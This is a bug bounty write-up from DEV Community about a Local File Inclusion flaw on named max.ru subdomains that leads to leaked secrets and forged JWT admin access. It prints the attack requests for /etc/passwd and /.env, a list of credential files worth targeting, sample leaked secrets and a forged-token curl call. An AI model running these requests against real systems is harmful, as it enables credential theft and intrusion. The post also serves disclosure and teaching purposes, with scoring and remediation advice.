DEV Community

Cover image for πŸ” From LFI to Full Infrastructure Compromise β€” A CVSS 9.0 Real-World Case Study
Dmitry Sorokin (@sorydima)
Dmitry Sorokin (@sorydima)

Posted on

πŸ” From LFI to Full Infrastructure Compromise β€” A CVSS 9.0 Real-World Case Study

This is the story of how a seemingly simple Local File Inclusion (LFI) vulnerability escalated into a complete API and infrastructure compromise during a bug bounty engagement.

The vulnerability allowed me to retrieve sensitive configuration files from *.max.ru subdomains, extract credentials, forge authentication tokens, and ultimately access private APIs and source code repositories.

πŸ“Ί PoC Video: YouTube
πŸ“‚ Evidence & Full Report: Yandex Disk


1️⃣ Reconnaissance & Initial Finding

During reconnaissance of the max.ru domain, I focused on parameters likely to handle file input. Two subdomains stood out:

  • business.max.ru
  • help.max.ru

The file parameter behaved suspiciously. Testing with /etc/passwd returned actual system file contents β€” a classic LFI signature.

Example test:

GET https://business.max.ru/?file=/etc/passwd HTTP/1.1
Host: business.max.ru
User-Agent: Mozilla/5.0
Accept: */*
Enter fullscreen mode Exit fullscreen mode

Response (truncated):

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
Enter fullscreen mode Exit fullscreen mode

The lack of sanitization allowed arbitrary local file reading.


2️⃣ Targeting High-Value Files

Once confirmed, I prioritized files with the highest potential impact:

File Purpose Potential Risk
.env Environment variables JWT secrets, DB creds, API keys
config.php Application configuration Database connection strings
.git/config Git repo configuration Repository URLs and tokens
/var/www/html/config/database.php DB credentials Full DB access
/proc/self/environ Runtime env vars Tokens in memory

Example request for .env:

GET https://help.max.ru/?file=/.env HTTP/1.1
Host: help.max.ru
User-Agent: curl/7.68.0
Accept: */*
Enter fullscreen mode Exit fullscreen mode

Example response:

APP_ENV=production
DB_HOST=db.max.ru
DB_USER=max_prod
DB_PASSWORD=Sup3rS3cretPass
JWT_SECRET=4a9c9b8f8d2a46f83d8e70f...
GIT_TOKEN=ghp_7d9f4a8321b...
Enter fullscreen mode Exit fullscreen mode

3️⃣ Secrets Obtained

The extracted configuration files revealed multiple high-value secrets:

  • JWT_SECRET β€” used to sign and validate authentication tokens
  • DB_USER / DB_PASSWORD β€” full database credentials
  • GitHub Personal Access Token β€” R/W access to private repositories
  • Third-party API keys β€” payment gateways, analytics, and internal tools

4️⃣ Exploiting the JWT_SECRET

With the JWT_SECRET, I could:

  1. Forge my own valid JSON Web Tokens
  2. Replay existing leaked tokens
  3. Impersonate any user, including administrators

PoC request using forged token:

curl -H "Authorization: Bearer forged_admin_token" \
     https://api.oneme.ru/api/user
Enter fullscreen mode Exit fullscreen mode

Result:
Private API endpoints returned data without any password authentication.


5️⃣ Impact Analysis

The vulnerability chain enabled:

  • Full API compromise β€” direct access to private endpoints
  • Database breach β€” ability to dump, alter, or delete data
  • Source code leak β€” private Git repos accessible with leaked tokens
  • Lateral movement β€” potential pivot to other internal services

Risk mapping (MITRE ATT&CK):

  • T1005 – Data from Local System
  • T1552.001 – Unsecured Credentials: Environment Variables
  • T1078 – Valid Accounts
  • T1550.003 – Use of Web Tokens

6️⃣ CVSS Scoring

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Score: 9.0 (Critical)

Breakdown:

  • AV:N β€” Network exploitable
  • AC:L β€” Low attack complexity
  • PR:N β€” No privileges required
  • UI:N β€” No user interaction required
  • S:C β€” Scope change (affects more than initial system)
  • C:H / I:H / A:H β€” High impact on confidentiality, integrity, and availability

7️⃣ Recommendations

  1. Input Validation β€” Sanitize and whitelist file parameters.
  2. Access Controls β€” Restrict sensitive files from public access via server config.
  3. Secret Management β€” Remove production secrets from deployable code.
  4. Token Rotation β€” Immediately rotate JWT secrets and API keys after exposure.
  5. Logging & Monitoring β€” Detect suspicious file access patterns.

8️⃣ Key Takeaways for Bug Hunters

  • Never underestimate an LFI β€” the real impact is in what it reveals.
  • .env and config.php are gold mines for credentials.
  • JWT secrets are as sensitive as passwords β€” treat them accordingly.
  • Git tokens can expose entire source codebases.
  • Always think in terms of attack chains, not isolated bugs.

Keywords: LFI, Local File Inclusion, JWT Bypass, Token Replay, Auth Bypass, API Hack, Bug Bounty, Pentest, Web Security, CVSS 9.0, Security Research, Exploit


This case reinforces a core truth in offensive security:

A single weak link β€” if exploited fully β€” can unravel the entire security posture of an organization.

Top comments (0)